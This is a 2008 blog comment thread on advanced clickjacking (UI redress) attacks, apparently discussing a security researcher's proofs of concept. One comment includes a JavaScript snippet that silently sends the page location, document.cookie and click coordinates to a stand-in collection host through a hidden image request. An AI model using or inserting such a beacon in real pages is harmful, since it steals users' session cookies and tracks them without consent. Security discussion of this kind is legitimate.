Comments on: More Advanced Clickjacking - UI Redress Attacks

By: un-excogitate.org » Blog Archive » It’s not a vulnerability when it’s a feature!

Sun, 19 Oct 2008 03:09:21 +0000

[...] tell they have found a legitimate use for UI Redressing (ref to RSnake, Jeremiah Grossman and the GNUCITIZEN mob). Just.. Wow! All the conflicting thoughts and emotions. I mean finally, I’ll have some [...]

By: Clickjacking - The new threat?

Clickjacking - The new threat? — Sun, 12 Oct 2008 11:25:07 +0000

[...] 2: A nice post from gnucitizen about [...]

By: GNUCITIZEN - Advanced Clickjacking Explained

GNUCITIZEN - Advanced Clickjacking Explained — Fri, 10 Oct 2008 13:02:21 +0000

[...] usual, GNUCITIZEN, and Security Bloggers Network Member posts a superb analysis of advanced clickjacking. The GNUCITIZEN blog is today’s Infosecurity.US MustRead! Sphere: Related [...]

By: unwiredbrain

unwiredbrain — Thu, 09 Oct 2008 16:29:00 +0000

pdp, yeah, my biggest interest was pointing out that in the next HTML specification things about clickjacking will be easier than ever to set up.

The where-victim-clicked stuff was my POC of your POC ;-) :-P

By: pdp

pdp — Thu, 09 Oct 2008 06:54:30 +0000

the pocs are fully functional. they have been verified by a few close friends.

unwiredbrain, you are absolutely right. I could have made the event bubble but a POC is a POC and nothing more :)

By: gnucitizen reader

gnucitizen reader — Thu, 09 Oct 2008 05:54:49 +0000

is it just me or any of your pocs are prepared to be functional?

By: Mr.V

Mr.V — Thu, 09 Oct 2008 02:54:23 +0000

I’m getting noscript’s clicjacking warning every time I try to open google images :( help.

By: mindcorrosive

mindcorrosive — Wed, 08 Oct 2008 23:51:24 +0000

I never knew that it was *that* easy.. Though you could probably mask the suspicious Flash-UI “Allow” button with an UI element as well, for maximum user frustration..

By: unwiredbrain

unwiredbrain — Wed, 08 Oct 2008 21:39:11 +0000

Little point of interest: an attacker could be very interested in where the victim clicked.

I mean: placing the attack on multiple elements can give to the attacker informations about page “hot spots” i.e. where the people most commonly click, allowing them to profile a better attack, according to the user feedback.

Here’s the code:

var request = "http://www.example.com/collectingDataScript.jpg?l="
        + escape(document.location) + "&c=" + escape(document.cookie) + "&x="
        + c.x + "&y=" + c.y;

var clickLogger = document.createElement("img");
    clickLogger.setAttribute("style", "position:absolute;left:-9999px;width:0;height:0;");
    clickLogger.setAttribute("src", request);

If you’re using Firebug, you’ll see in the Net panel the requests the script makes.

Going a little further, in HTML 5 frames can send messages to each other [1], so there will be no more need to use a double click: the inline frame will only have to watch for messages from the hosting window!

[1] http://it.youtube.com/watch?v=xIxDJof7xxQ — from 05:40 to 15:20